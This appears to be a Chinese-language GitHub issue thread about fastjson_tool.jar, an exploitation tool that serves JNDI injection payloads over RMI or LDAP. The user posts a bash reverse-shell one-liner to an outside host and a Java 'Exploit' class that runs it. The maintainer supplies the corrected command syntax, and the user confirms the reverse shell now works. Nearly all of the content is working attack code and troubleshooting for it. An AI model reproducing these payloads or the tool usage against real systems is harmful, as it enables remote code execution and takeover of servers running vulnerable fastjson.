We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
当我启用RMI或者LDAP后:
java -cp fastjson_tool.jar fastjson.HRMIServer 1.1.1.1 8888 "bash -i >&/dev/tcp/x.x.x.x/80 0>&1"
RMI服务显示有请求,但是nc端没有连接。当我使用其他Payload时,可以进行反弹,例如:
import java.io.BufferedReader; import java.io.InputStream; import java.io.InputStreamReader; public class Exploit{ public Exploit() throws Exception { Process p = Runtime.getRuntime().exec(new String[]{"bash", "-c", "bash -i >& /dev/tcp/x.x.x.x/80 0>&1"}); InputStream is = p.getInputStream(); BufferedReader reader = new BufferedReader(new InputStreamReader(is)); String line; while((line = reader.readLine()) != null) { System.out.println(line); } p.waitFor(); is.close(); reader.close(); p.destroy(); } public static void main(String[] args) throws Exception { } }
由于您的工具已经打成了jar我,我无法分析查看。故提此issuse
The text was updated successfully, but these errors were encountered:
java -cp fastjson_tool.jar fastjson.HRMIServer 1.1.1.1 8888 "bash=bash -i >&/dev/tcp/x.x.x.x/80 0>&1" 试试
Sorry, something went wrong.
反弹shell一切正常,再次感谢作者
No branches or pull requests
当我启用RMI或者LDAP后:
RMI服务显示有请求,但是nc端没有连接。当我使用其他Payload时,可以进行反弹,例如:
由于您的工具已经打成了jar我,我无法分析查看。故提此issuse
The text was updated successfully, but these errors were encountered: